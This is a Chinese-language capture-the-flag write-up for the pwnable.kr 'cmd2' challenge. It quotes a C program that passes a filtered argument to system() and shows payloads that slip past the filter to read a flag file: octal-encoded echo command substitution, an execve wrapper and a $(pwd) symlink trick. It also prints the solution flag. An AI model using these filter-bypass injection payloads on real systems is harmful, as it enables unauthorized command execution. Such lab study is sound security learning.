Daddy bought me a system command shell.
but he put some filters to prevent me from playing with it without his permission...
but I wanna play anytime I want!

ssh cmd2@pwnable.kr -p2222 (pw:flag of cmd1)

承接上题，参数过滤的内容增加了 "/" ，使得我们不能简单地通过 /bin/cat 来执行shell 。所以这里的关键是怎么样构造一个可以不含任何被过滤内容的字串，并且可以在命令执行时被解析出来。

先放上 cmd2.c 源码：

#include <stdio.h>
#include <string.h>

int filter(char* cmd){
    int r=0;
    r += strstr(cmd, "=")!=0;
    r += strstr(cmd, "PATH")!=0;
    r += strstr(cmd, "export")!=0;
    r += strstr(cmd, "/")!=0;
    r += strstr(cmd, "`")!=0;
    r += strstr(cmd, "flag")!=0;
    return r;
}

extern char** environ;
void delete_env(){
    char** p;
    for(p=environ; *p; p++) memset(*p, 0, strlen(*p));
}

int main(int argc, char* argv[], char** envp){
    delete_env();
    putenv("PATH=/no_command_execution_until_you_become_a_hacker");
    if(filter(argv[1])) return 0;
    printf("%s\n", argv[1]);
    system( argv[1] );
    return 0;
}

笔者一开始的思路是通过 python 构造参数输入，其中命令 /bin/cat flag 先转成十六进制字符串：

from pwn import *

cmd = "/bin/cat flag"
print "\\" + "\\".join(hex(c) for c in ordlist(cmd))

再通过python传值并解析。但是由于输入时的引号限制，所以在 /tmp 目录下新建了一个自己的目录，写了一段代码尝试：

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>


int main()
{
    printf("input:\n");
    char *argv[3] = {0};
    argv[0] = "/home/cmd2/cmd2";
    argv[1] = "$(python -c 'print \"\\x2f\\x62\\x69\\x6e\\x2f\\x63\\x61\\x74\\x20\\x66\\x6c\\x61\\x67\"')";
    execve("/home/cmd2/cmd2", argv, NULL);
    return 0;
}

这样构造的参数可以通过验证，但是还存在一个限制：

input:
$(python -c 'print "\x2f\x62\x69\x6e\x2f\x63\x61\x74\x20\x66\x6c\x61\x67"')
sh: 1: python: not found

因为 putenv("PATH=/no_command_execution_until_you_become_a_hacker"); 这一语句的关系，导致 python 无法被解析，所以这个思路基本上是走不通了 :(

转而想到echo，但这里 sh 并不认可 -e :(

sh: 1: -e: not found

（echo 命令不通过参数 e 也可以解析出 16 进制 和 8 进制的字串，不过不同 echo 版本会对这个功能有所限制，像笔者虚拟机 Ubuntu 16.04 的 echo 就无法解析，只有 echo -e 才能解析特殊字符），现在服务器上测试 echo 能否直接解析出 16 进制字符串：

$ echo "\x2f\x62\x69\x6e\x2f\x63\x61\x74\x20\x66\x6c\x61\x67"
\x2f\x62\x69\x6e\x2f\x63\x61\x74\x20\x66\x6c\x61\x67

看来并不行，再尝试 8 进制字串，先用 python 跑出 8 进制字串：

from pwn import *

cmd = "/bin/cat flag"
print "\\" + "\\".join(oct(c) for c in ordlist(cmd))

到 remote host 去尝试：

$ echo "\057\0142\0151\0156\057\0143\0141\0164\040\0146\0154\0141\0147"
/bin/cat flag

似乎看到了成功的希望，接下来只要 echo 被 sh “认可”就行了。
更改后的程序代码如下：

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>


int main()
{
    printf("input:\n");
    char *argv[3] = {0};
    argv[0] = "/home/cmd2/cmd2";
    argv[1] = "$(echo \"\\057\\0142\\0151\\0156\\057\\0143\\0141\\0164\\040\\0146\\0154\\0141\\0147\")";
    execve("/home/cmd2/cmd2", argv, NULL);
    return 0;
}

这里还要注意当前是位于 /tmp 下的子目录，需要先 ln -s /home/cmd2/flag flag ，为 flag 文件添加一个软链接，之后编译运行：

input:
$(echo "\057\0142\0151\0156\057\0143\0141\0164\040\0146\0154\0141\0147")
FuN_w1th_5h3ll_v4riabl3s_haha

Done.

其实这里在 /home/cmd2 目录下

$ ./cmd2 '$(echo "\057\0142\0151\0156\057\0143\0141\0164\040\0146\0154\0141\0147")'

直接运行也是一样的，不存在字符串多个引号的问题了。

另外在看别人的 writeup 时发现了一种“骚套路”：
（http://blog.csdn.net/hwz2311245/article/details/50555295）

首先在/tmp目录下建立自己的目录exploit，然后创建目录/tmp/exploit/c。那么，如果在/tmp/exploit/c目录下执行pwd命令就可以得到/tmp/exploit/c了。然后在/tmp/exploit下构造cat的软应用ln -s /bin/cat cat，在/tmp/exploit/c下建立flag的软引用ln -s /home/cmd2/flag flag。然后在/tmp/exploit/c下执行命令/home/cmd2/cmd2 "$(pwd)at f*"就可以得到flag了。其原理就是利用“$(pwd)at”构造出/tmp/exploit/cat命令。

$ ln -s /bin/cat cat
$ mkdir c
$ cd c
$ ln -s /home/cmd2/flag flag
$ /home/cmd2/cmd2 "\$(pwd)at f*"
$(pwd)at f*
FuN_w1th_5h3ll_v4riabl3s_haha